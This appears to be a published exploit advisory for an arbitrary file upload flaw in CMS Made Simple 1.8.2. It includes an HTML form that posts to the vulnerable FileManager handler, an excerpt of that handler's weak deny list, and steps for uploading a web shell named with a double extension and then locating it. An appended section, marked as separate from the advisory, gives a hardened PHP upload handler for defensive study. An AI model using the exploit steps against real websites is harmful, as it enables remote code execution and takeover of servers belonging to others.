#############################################################################################################
# Exploit Title: cmsmadesimple-1.8.2 File Upload Vulnerability
# Author: ITTIHACK
# Software Site : http://www.cmsmadesimple.org
# Download Link: http://s3.amazonaws.com/cmsms/downloads/5953/cmsmadesimple-1.8.2-base.tar.gz
# Version: 1.8.2
# Category: webapps
# Tested on: Windows 7
# Home : http://ittihack.blogspot.com
#############################################################################################################

Proof of Concept:
---------------------------------------------------------------------------------------------------------------------------------------------------
1) file: uploadTest.html

<html>
<head>
<title>Upload Test</title>
</head>
<body>
<p>
<form method='POST' enctype='multipart/form-data' action='http://localhost/cmsmadesimple/modules/FileManager/postlet/javaUpload.php'>
File to upload: <input type=file name=userfile><br>
<input type=submit value=Press> to upload the file!
</form>
</p>
</body>
</html>
---------------------------------------------------------------------------------------------------------------------------------------------------
2) File: javaUpload.php (excerpt of the vulnerable handler)

$uploaddir = '[PATH TO UPLOAD DIRECTORY]';   <-- here is the path for your shell
$allow_or_deny_method = "deny"; // "allow" or "deny"
$file_extension_list = array("php","asp","pl");

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .$_FILES['userfile']['name']))

The deny list covers only php, asp and pl, and the file is written under the client-supplied name, so a name such as Shell.php.phtml is neither blocked nor renamed.
==================================================================================================================================================
- Exploit: http://localhost/cmsmadesimple-1.8.2-base/modules/FileManager/postlet/uploadTest.html
- Upload your shell as Shell.php.phtml
- You will find your shell here:
  http://localhost/cmsmadesimple-1.8.2-base/modules/FileManager/postlet/[PATH TO UPLOAD DIRECTORY]Shell.php.phtml
===================================================================================================================================================

./ITTIHACK
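As an added example of the defensive fix (not CMS Made Simple's code and not part of the advisory): the excerpt denies three extensions and keeps the uploaded filename, so the double-extension name passes and lands on disk unchanged. Replacing the deny list with an allow list on the final extension and generating the stored name server-side closes both gaps; the allow list, the function names and the upload directory are assumptions.

```php
<?php
// Hardened upload handling (illustrative; not the project's own code).
// Two changes against the vulnerable excerpt:
//  1. an allow list is checked instead of a short deny list, so a name like
//     "Shell.php.phtml" is rejected because its last extension is not listed;
//  2. the stored name is generated here, so the client-supplied name never
//     reaches the filesystem.
// The directory should also sit outside the web root or have script
// execution disabled, which this code cannot enforce on its own.

// Assumed allow list; adjust to what the application really needs to accept.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

// True only when the final extension (lower-cased) is on the allow list.
// Names without an extension, and names like ".htaccess", are refused.
function extensionAllowed(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return $ext !== '' && in_array($ext, ALLOWED_EXTENSIONS, true);
}

// Random stored name that keeps only the already-validated extension.
function storedName(string $clientName): string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Returns the stored path on success, null when the upload is refused.
function handleUpload(array $file, string $uploadDir): ?string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!extensionAllowed($file['name'])) {
        return null; // "Shell.php.phtml" is stopped here
    }
    $target = rtrim($uploadDir, '/') . '/' . storedName($file['name']);
    // move_uploaded_file() refuses anything that is not a genuine upload.
    return move_uploaded_file($file['tmp_name'], $target) ? $target : null;
}

// Constructed sample names from the advisory, checked against the allow list.
foreach (['Shell.php.phtml', 'photo.png', 'notes', '.htaccess'] as $name) {
    echo $name, ' => ', extensionAllowed($name) ? 'accepted' : 'rejected', PHP_EOL;
}
```

The check runs on the name alone; pair it with a content-type or magic-byte check and a non-executable upload directory before relying on it.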